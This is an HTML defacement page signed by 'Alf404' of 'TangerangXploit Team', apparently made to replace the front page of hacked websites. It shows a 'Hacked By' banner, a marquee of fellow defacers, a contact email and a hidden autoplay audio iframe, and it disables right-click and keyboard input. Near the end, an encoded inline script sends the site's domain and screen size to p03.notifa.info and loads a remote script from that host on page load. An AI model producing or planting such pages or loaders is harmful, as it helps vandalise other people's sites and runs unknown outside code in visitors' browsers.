// Recode ? Usahakan Author nya Jangan Diganti !!
// Coded By Alf404
<DOCYPE html> 

<head> 

   <link rel="icon" type="image/jpg" href="https://h.top4top.io/p_19108vw640.jpg">

    <meta name="description" content="☠️{ TangerangXploit Team }☠️">

     <meta name="keywords" content="Nothing Special"> 
     	
     <meta name="author" content="Alf404">

     <meta http-equiv="cache-control" content="index,cache">

      <meta http-equiv="pragma" content="index,cache">

       <title>Hacked?</title>

       

<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>

<meta charset="utf-8">

<meta name="description" og:content="Not Now">

<meta name="og:description" content="TangerangXploit Team">

<meta property="og:image" content="https://c.top4top.io/p_1938tvcwn0.gif">

<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">

<style> html,

body { color: #FFFFFF; font-family: 'Kelly Slab', sans-serif; font-weight: 60; height: 60vh; margin: 0; }

.full-height { height: 67vh; }

.flex-center { align-items: center; display: flex; justify-content: center; }

.position-ref { position: relative; }

.content { text-align: center; }

.title{ font-size: 36px; padding: 20px; }

	input {

		background: transparent;

		color: black;

		border: 1px solid black;

	}

	input:hover{

		color: black;

	}

</style> 

<style type=text/css >

.blink_text {

-webkit-animation-name: blinker;

-webkit-animation-duration: 2s;

-webkit-animation-timing-function: linear;

-webkit-animation-iteration-count: infinite;



-moz-animation-name: blinker;

-moz-animation-duration: 2s;

-moz-animation-timing-function: linear;

-moz-animation-iteration-count: infinite;



animation-name: blinker;

animation-duration: 2s;

animation-timing-function: linear;

animation-iteration-count: infinite;



color: red;

}

@-moz-keyframes blinker { 

0% { opacity: 5.0;

}

50% { opacity: 0.0;

}

100% { opacity: 5.0;

}

}

@-webkit-keyframes blinker { 

0% { opacity: 5.0;

}

50% { opacity: 0.0;

}

100% { opacity: 5.0;

}

}

@keyframes blinker { 

0% { opacity: 5.0;

}

50% { opacity: 0.0;

}

100% { opacity: 5.0;

}

}



#copy {

	color: lime;

	font-weight: bold;

	font-family: Kelly Slab;

}

#copy a {

	color: white;

}

#copy a:hover {

	color: blue;

}



body{

font-family: Kelly Slab;

background-color: black;

color:white;

}

#content tr:hover{

background-color: blue;

text-shadow:0px 0px 10px #fff;

}

#content .first{

background-color: #15CFF4;

}

table{

border: 1px #000000;

}

.s_tb{

border:1px silver;

}

a{

color:white;

font-size: 19px;

text-decoration:none;

}

a:hover{

color:green;

text-shadow:0px 0px 10px #ffffff;

}

input,select,textarea{

border: 2px #000000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

h2{

font-family:Kelly Slab;

font-size:25px;

color:white;

}

h3{

font-size:35px;

}

h4{

font-size:15px;

font-family:Kelly Slab;

color:white;

}

</style>



<center>



<body align="center" oncontextmenu="return false" bgcolor="black">

<div class="stars"><div class="twinkling">

<div class="flex-center position-ref full-height"> <div class="content"> 

<div class="text">

<font color="white"> 

<img src="https://c.top4top.io/p_1938tvcwn0.gif" width="420" height="420"><br><i>

<p class="blink_text"style="font-size:45px;color: white;text-shadow: 0px 0px 0px #00ffff , 0px 0px 0px #00ffff;font-family:Kelly Slab;">Hacked By Alf404 - TangerangXploit Team

<style =font-size;45px;color: orange;text-shadow: 0px 0px 29px white , 0px 0px 29px white;> <br></style></p>

<font size="5"font color="white"> Never Leave me <font color="red"> For No Apparent Reason<br><font color="red" face="">Greetz :<font color="aqua"><marquee width="400">Alf404 - Mr.d30 - YIIX103 - L4yn.ID - MR.B0L4N999 - ./M0R3N0 - FR4N5_NET - R4y.XpLoiT404 - ./Mr.F4J4R - VenoRyan - DemonNight - AAF Exploiter
- 0lyx.id - x-r00t@krypt0n-x
- Helix - Mr.W4NT3K - ./pitaaachaaan_ - Zinc - xLolzV13z - AntiSosial1337 - Muhammad Fatoni - Hazee - Dewa•Ayu</marquee><font color="white"><br>tangerangxploit@yahoo.com<br><br>



<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX2Jt0jmrdO%2fNxhbNbnP8PtuR9VzDKoIbxRsZJf%2bwYanYZ0vnYEkjdD%2bCFVb%2fwrHGPa6wXjMg7zSe3CB4%2fgc1GVhl%2fIBaXnLHzanHf2yurBw9Uy%2fJaBguleyMC2VrPVzzKqQp9vr6IzMvQHrEmI8TajHchNpa6UZcazPiFe90xiESHq4OP%2b1T9DXle4oEztNjzDiP1Jb%2bTqW85inLU5L2RD%2b24RZqEEAA5CVGGB%2b8wg6j9tK%2frg8PwztWwbLR3CAuG%2bp%2fQWLX%2fST%2fiF%2b624B62eulM5dqteN1McWdoyyh6up%2b316iT0GbImZiA2XNc%2bIf4lyCXm%2bsDUZggByMMXfyxdmVCMK3XTKVnwt4Ab0IFHXau%2birz%2bi0mxRtL1OrZOJhYf%2bw6XxQnoOC3RKwPGVgSkJcC4%2bcE2bWNGBFytiCSFFTyVOdrMzw7RUvVnPkqu26ykV%2bUTjAauCKP1xpB7ddcn7stXDRNvHLP6sM6zmyAkkS8OeYDTW%2bLHTDaILb0eebuolDbHl04P8plF4NQU%2bDK2xyumzxQhUrv%2fs36uA9n5AA%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>

<iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://j.top4top.io/m_19387linv0.mp3" ></iframe>

</font>

</font>

</font>

</font>

</font>

</font>

</font>

</font>

</i>

</font>

</div>

</div>

</div>

</div>

</div>

</body>

</center>

</body>

</head>

</html>